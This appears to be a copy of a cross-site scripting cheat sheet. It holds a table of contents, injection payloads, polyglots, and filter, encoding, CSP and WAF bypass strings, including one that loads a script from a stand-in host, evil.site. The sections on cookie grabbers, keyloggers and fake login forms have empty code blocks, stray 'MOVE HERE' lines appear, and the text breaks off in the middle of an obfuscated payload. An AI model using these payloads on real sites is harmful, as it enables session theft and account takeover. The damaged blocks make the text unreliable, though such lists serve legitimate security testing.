# Cross Site Scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. ## Summary - [Cross Site Scripting](#cross-site-scripting) - [Summary](#summary) - [Exploit code or POC](#exploit-code-or-poc) - [Data grabber for XSS](#data-grabber-for-xss) - [CORS](#cors) - [UI redressing](#ui-redressing) - [Javascript keylogger](#javascript-keylogger) - [Other ways](#other-ways) - [Identify an XSS endpoint](#identify-an-xss-endpoint) - [Tools](#tools) - [XSS in HTML/Applications](#xss-in-htmlapplications) - [Common Payloads](#common-payloads) - [XSS using HTML5 tags](#xss-using-html5-tags) - [XSS using a remote JS](#xss-using-a-remote-js) - [XSS in hidden input](#xss-in-hidden-input) - [XSS when payload is reflected capitalized](#xss-when-payload-is-reflected-capitalized) - [DOM based XSS](#dom-based-xss) - [XSS in JS Context](#xss-in-js-context) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files](#xss-in-files) - [XSS in XML](#xss-in-xml) - [XSS in SVG](#xss-in-svg) - [XSS in SVG (short)](#xss-in-svg-short) - [XSS in Markdown](#xss-in-markdown) - [XSS in SWF flash application](#xss-in-swf-flash-application) - [XSS in SWF flash application](#xss-in-swf-flash-application-1) - [XSS in CSS](#xss-in-css) - [XSS in PostMessage](#xss-in-postmessage) - [Blind XSS](#blind-xss) - [XSS Hunter](#xss-hunter) - [Other Blind XSS tools](#other-blind-xss-tools) - [Blind XSS endpoint](#blind-xss-endpoint) - [Tips](#tips) - [Mutated XSS](#mutated-xss) - [Polyglot XSS](#polyglot-xss) - [Filter Bypass and exotic payloads](#filter-bypass-and-exotic-payloads) - [Bypass case sensitive](#bypass-case-sensitive) - [Bypass tag blacklist](#bypass-tag-blacklist) - [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation) - [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag) - [Bypass quotes for string](#bypass-quotes-for-string) - [Bypass quotes in script tag](#bypass-quotes-in-script-tag) - [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event) - [Bypass dot filter](#bypass-dot-filter) - [Bypass parenthesis for string](#bypass-parenthesis-for-string) - [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon) - [Bypass onxxxx= blacklist](#bypass-onxxxx-blacklist) - [Bypass space filter](#bypass-space-filter) - [Bypass email filter](#bypass-email-filter) - [Bypass document blacklist](#bypass-document-blacklist) - [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist) - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) - [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect) - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) - [Bypass ">" using nothing](#bypass--using-nothing) - [Bypass "<" and ">" using < and >](#bypass--and--using--and-) - [Bypass ";" using another character](#bypass--using-another-character) - [Bypass using HTML encoding](#bypass-using-html-encoding) - [Bypass using Katana](#bypass-using-katana) - [Bypass using Cuneiform](#bypass-using-cuneiform) - [Bypass using Lontara](#bypass-using-lontara) - [Bypass using ECMAScript6](#bypass-using-ecmascript6) - [Bypass using Octal encoding](#bypass-using-octal-encoding) - [Bypass using Unicode](#bypass-using-unicode) - [Bypass using UTF-7](#bypass-using-utf-7) - [Bypass using UTF-8](#bypass-using-utf-8) - [Bypass using UTF-16be](#bypass-using-utf-16be) - [Bypass using UTF-32](#bypass-using-utf-32) - [Bypass using BOM](#bypass-using-bom) - [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation) - [Bypass using jsfuck](#bypass-using-jsfuck) - [CSP Bypass](#csp-bypass) - [Bypass CSP using JSONP from Google (Trick by @apfeifer27)](#bypass-csp-using-jsonp-from-google-trick-by-apfeifer27) - [Bypass CSP by lab.wallarm.com](#bypass-csp-by-labwallarmcom) - [Bypass CSP by Rhynorater](#bypass-csp-by-rhynorater) - [Bypass CSP by @akita_zen](#bypass-csp-by-akita_zen) - [Bypass CSP by @404death](#bypass-csp-by-404death) - [Common WAF Bypass](#common-waf-bypass) - [Cloudflare XSS Bypasses by @Bohdan Korzhynskyi](#cloudflare-xss-bypasses-by-bohdan-korzhynskyi) - [25st January 2021](#25st-january-2021) - [21st April 2020](#21st-april-2020) - [22nd August 2019](#22nd-august-2019) - [5th June 2019](#5th-june-2019) - [3rd June 2019](#3rd-june-2019) - [Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)](#cloudflare-xss-bypass---22nd-march-2019-by-rakeshmane10) - [Cloudflare XSS Bypass - 27th February 2018](#cloudflare-xss-bypass---27th-february-2018) - [Chrome Auditor - 9th August 2018](#chrome-auditor---9th-august-2018) - [Incapsula WAF Bypass by @Alra3ees- 8th March 2018](#incapsula-waf-bypass-by-alra3ees--8th-march-2018) - [Incapsula WAF Bypass by @c0d3G33k - 11th September 2018](#incapsula-waf-bypass-by-c0d3g33k---11th-september-2018) - [Incapsula WAF Bypass by @daveysec - 11th May 2019](#incapsula-waf-bypass-by-daveysec---11th-may-2019) - [Akamai WAF Bypass by @zseano - 18th June 2018](#akamai-waf-bypass-by-zseano---18th-june-2018) - [Akamai WAF Bypass by @s0md3v - 28th October 2018](#akamai-waf-bypass-by-s0md3v---28th-october-2018) - [WordFence WAF Bypass by @brutelogic - 12th September 2018](#wordfence-waf-bypass-by-brutelogic---12th-september-2018) - [Fortiweb WAF Bypass by @rezaduty - 9th July 2019](#fortiweb-waf-bypass-by-rezaduty---9th-july-2019) - [References](#references) ## Exploit code or POC ### Data grabber for XSS Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page. ```html ``` Write the collected data into a file. ```php ``` ### CORS ```html ``` ### UI redressing Leverage the XSS to modify the HTML content of the page in order to display a fake login form. ```html ``` ### Javascript keylogger Another way to collect sensitive data is to set a javascript keylogger. ```javascript ``` ### Other ways More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all): - [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/) - [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/) - [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html) - [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html) - [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html) - [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html) ## Identify an XSS endpoint This payload opens the debugger in the developer console rather than triggering a popup alert box. ```javascript ``` Modern applications with content hosting can use [sandbox domains][sandbox-domains] > to safely host various types of user-generated content. Many of these sandboxes are specifically meant to isolate user-uploaded HTML, JavaScript, or Flash applets and make sure that they can't access any user data. [sandbox-domains]:https://security.googleblog.com/2012/08/content-hosting-for-modern-web.html For this reason, it's better to use `alert(document.domain)` or `alert(window.origin)` rather than `alert(1)` as default XSS payload in order to know in which scope the XSS is actually executing. Better payload replacing ``: ```html ``` While `alert()` is nice for reflected XSS it can quickly become a burden for stored XSS because it requires to close the popup for each execution, so `console.log()` can be used instead to display a message in the console of the developer console (doesn't require any interaction). Example: ```html ``` References: - [Google Bughunter University - XSS in sandbox domains](https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain) - [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c) - [LiveOverflow blog post - DO NOT USE alert(1) for XSS](https://liveoverflow.com/do-not-use-alert-1-in-xss/) ### Tools Most tools are also suitable for blind XSS attacks: * [XSSStrike](https://github.com/s0md3v/XSStrike): Very popular but unfortunately not very well maintained * [xsser](https://github.com/epsylon/xsser): Utilizes a headless browser to detect XSS vulnerabilities * [Dalfox](https://github.com/hahwul/dalfox): Extensive functionality and extremely fast thanks to the implementation in Go * [XSpear](https://github.com/hahwul/XSpear): Similar to Dalfox but based on Ruby * [domdig](https://github.com/fcavallarin/domdig): Headless Chrome XSS Tester ## XSS in HTML/Applications ### Common Payloads ```javascript // Basic payload ipt>alert('XSS')ipt> "> "> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" // Img payload xss "> "> // Svg payload "> ">(`Firefox` is the only browser which allows self closing script)
MOVE HERE
MOVE HERE
MOVE HERE
MOVE HERE
MOVE HERE
MOVE HERE
MOVE HERE
``` ### XSS using HTML5 tags ```javascript \x3csVg/\x3e ``` Polyglot XSS - Ashar Javed ```javascript ">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> ``` Polyglot XSS - Mathias Karlsson ```javascript " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// ``` Polyglot XSS - Rsnake ```javascript ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> ``` Polyglot XSS - Daniel Miessler ```javascript ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* javascript://--></title></style></textarea></script><svg "//' onclick=alert()// /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* ``` Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) ```javascript -->'"/></sCript><svG x=">" onload=(co\u006efirm)``> ``` ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) ```javascript <svg%0Ao%00nload=%09((pro\u006dpt))()// ``` Polyglot XSS - from [@filedescriptor's Polyglot Challenge](http://polyglot.innerht.ml) ```javascript # by crlf javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> # by europa javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//> # by EdOverflow javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//> # by h1/ragnar javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>` ``` Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/) ```javascript JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76--> ``` ## Filter Bypass and exotic payloads ### Bypass case sensitive ```javascript <sCrIpt>alert(1)</ScRipt> ``` ### Bypass tag blacklist ```javascript <script x> <script x>alert('XSS')<script y> ``` ### Bypass word blacklist with code evaluation ```javascript eval('ale'+'rt(0)'); Function("ale"+"rt(1)")(); new Function`al\ert\`6\``; setTimeout('ale'+'rt(2)'); setInterval('ale'+'rt(10)'); Set.constructor('ale'+'rt(13)')(); Set.constructor`al\x65rt\x2814\x29```; ``` ### Bypass with incomplete html tag Works on IE/Firefox/Chrome/Safari ```javascript <img src='1' onerror='alert(0)' < ``` ### Bypass quotes for string ```javascript String.fromCharCode(88,83,83) ``` ### Bypass quotes in script tag ```javascript http://localhost/bla.php?test=</script><script>alert(1)</script> <html> <script> <?php echo 'foo="text '.$_GET['test'].'";';`?> </script> </html> ``` ### Bypass quotes in mousedown event You can bypass a single quote with &#39; in an on mousedown event handler ```javascript <a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a> ``` ### Bypass dot filter ```javascript <script>window['alert'](document['domain'])</script> ``` Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777` http://www.geektools.com/cgi-bin/ipconv.cgi ```javascript <script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script> ``` Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==` ### Bypass parenthesis for string ```javascript alert`1` setTimeout`alert\u0028document.domain\u0029`; ``` ### Bypass parenthesis and semi colon ```javascript // From @garethheyes <script>onerror=alert;throw 1337</script> <script>{onerror=alert}throw 1337</script> <script>throw onerror=alert,'some string',123,'haha'</script> // From @terjanq <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> // From @cgvwzq <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> ``` ### Bypass onxxxx= blacklist ```javascript <object onafterscriptexecute=confirm(0)> <object onbeforescriptexecute=confirm(0)> // Bypass onxxx= filter with a null byte/vertical tab <img src='1' onerror\x00=alert(0) /> <img src='1' onerror\x0b=alert(0) /> // Bypass onxxx= filter with a '/' <img src='1' onerror/=alert(0) /> ``` ### Bypass space filter ```javascript // Bypass space filter with "/" <img/src='1'/onerror=alert(0)> // Bypass space filter with 0x0c/^L <svg onload = alert(1) > $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al 00000010: 6572 7428 3129 0c3e 0a ert(1).>. ``` ### Bypass email filter ([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)) ```javascript "><svg/onload=confirm(1)>"@x.y ``` ### Bypass document blacklist ```javascript <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script> window["doc"+"ument"] ``` ### Bypass document.cookie blacklist This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. ``` window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);}); ``` ### Bypass using javascript inside a string ```javascript <script> foo="text </script><script>alert(1)</script>"; </script> ``` ### Bypass using an alternate way to redirect ```javascript location="http://google.com" document.location = "http://google.com" document.location.href="http://google.com" window.location.assign("http://google.com") window['location']['href']="http://google.com" ``` ### Bypass using an alternate way to execute an alert From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet. ```javascript window['alert'](0) parent['alert'](1) self['alert'](2) top['alert'](3) this['alert'](4) frames['alert'](5) content['alert'](6) [7].map(alert) [8].find(alert) [9].every(alert) [10].filter(alert) [11].findIndex(alert) [12].forEach(alert); ``` From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**. ```javascript c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; } // 5 ``` Then calling alert is : ```javascript Object.keys(self)[5] // "alert" self[Object.keys(self)[5]]("1") // alert("1") ``` We can find "alert" with a regular expression like ^a[rel]+t$ : ```javascript a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a() // then you can use a() with Object.keys self[Object.keys(self)[a()]]("1") // alert("1") ``` Oneliner: ```javascript a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1") ``` From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet. ```javascript prompt`${document.domain}` document.location='java\tscript:alert(1)' document.location='java\rscript:alert(1)' document.location='java\tscript:alert(1)' ``` From [@404death](https://twitter.com/404death/status/1011860096685502464) tweet. ```javascript eval('ale'+'rt(0)'); Function("ale"+"rt(1)")(); new Function`al\ert\`6\``; constructor.constructor("aler"+"t(3)")(); [].filter.constructor('ale'+'rt(4)')(); top["al"+"ert"](5); top[8680439..toString(30)](7); top[/al/.source+/ert/.source](8); top['al\x65rt'](9); open('java'+'script:ale'+'rt(11)'); location='javascript:ale'+'rt(12)'; setTimeout`alert\u0028document.domain\u0029`; setTimeout('ale'+'rt(2)'); setInterval('ale'+'rt(10)'); Set.constructor('ale'+'rt(13)')(); Set.constructor`al\x65rt\x2814\x29```; ``` Bypass using an alternate way to trigger an alert ```javascript var i = document.createElement("iframe"); i.onload = function(){ i.contentWindow.alert(1); } document.appendChild(i); // Bypassed security XSSObject.proxy = function (obj, name, report_function_name, exec_original) { var proxy = obj[name]; obj[name] = function () { if (exec_original) { return proxy.apply(this, arguments); } }; XSSObject.lockdown(obj, name); }; XSSObject.proxy(window, 'alert', 'window.alert', false); ``` ### Bypass ">" using nothing You don't need to close your tags. ```javascript <svg onload=alert(1)// ``` ### Bypass "<" and ">" using < and > Unicode Character U+FF1C and U+FF1E ```javascript <script/src=//evil.site/poc.js> ``` ### Bypass ";" using another character ```javascript 'te' * alert('*') * 'xt'; 'te' / alert('/') / 'xt'; 'te' % alert('%') % 'xt'; 'te' - alert('-') - 'xt'; 'te' + alert('+') + 'xt'; 'te' ^ alert('^') ^ 'xt'; 'te' > alert('>') > 'xt'; 'te' < alert('<') < 'xt'; 'te' == alert('==') == 'xt'; 'te' & alert('&') & 'xt'; 'te' , alert(',') , 'xt'; 'te' | alert('|') | 'xt'; 'te' ? alert('ifelsesh') : 'xt'; 'te' in alert('in') in 'xt'; 'te' instanceof alert('instanceof') instanceof 'xt'; ``` ### Bypass using HTML encoding ```javascript %26%2397;lert(1) &#97;&#108;&#101;&#114;&#116; ></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)> ``` ### Bypass using Katana Using the [Katakana](https://github.com/aemkei/katakana.js) library. ```javascript javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() ``` ### Bypass using Cuneiform ```javascript 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() ``` ### Bypass using Lontara ```javascript ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")() ``` More alphabets on http://aem1k.com/aurebesh.js/# ### Bypass using ECMAScript6 ```html <script>alert&DiacriticalGrave;1&DiacriticalGrave;</script> ``` ### Bypass using Octal encoding ```javascript javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' ``` ### Bypass using Unicode ```javascript Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was transformed into U+003C LESS­THAN SIGN (<) Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (") Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/ %EF%BC%9E becomes > %EF%BC%9C becomes < ``` Bypass using Unicode converted to uppercase ```javascript İ (%c4%b0).toLowerCase() => i ı (%c4%b1).toUpperCase() => I ſ (%c5%bf) .toUpperCase() => S K (%E2%84%AA).toLowerCase() => k <ſvg onload=... > become <SVG ONLOAD=...> <ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=> ``` ### Bypass using UTF-7 ```javascript +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- ``` ### Bypass using UTF-8 ```javascript < = %C0%BC = %E0%80%BC = %F0%80%80%BC > = %C0%BE = %E0%80%BE = %F0%80%80%BE ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7 " = %C0%A2 = %E0%80%A2 = %F0%80%80%A2 " = %CA%BA ' = %CA%B9 ``` ### Bypass using UTF-16be ```javascript %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00 \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00> ``` ### Bypass using UTF-32 ```js %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E ``` ### Bypass using BOM Byte Order Mark (The page must begin with the BOM character.) BOM character allows you to override charset of the page ```js BOM Character for UTF-16 Encoding: Big Endian : 0xFE 0xFF Little Endian : 0xFF 0xFE XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E BOM Character for UTF-32 Encoding: Big Endian : 0x00 0x00 0xFE 0xFF Little Endian : 0xFF 0xFE 0x00 0x00 XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E ``` ### Bypass using weird encoding or native interpretation ```javascript <script>\u0061\u006C\u0065\u0072\u0074(1)</script> <img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" /> <iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!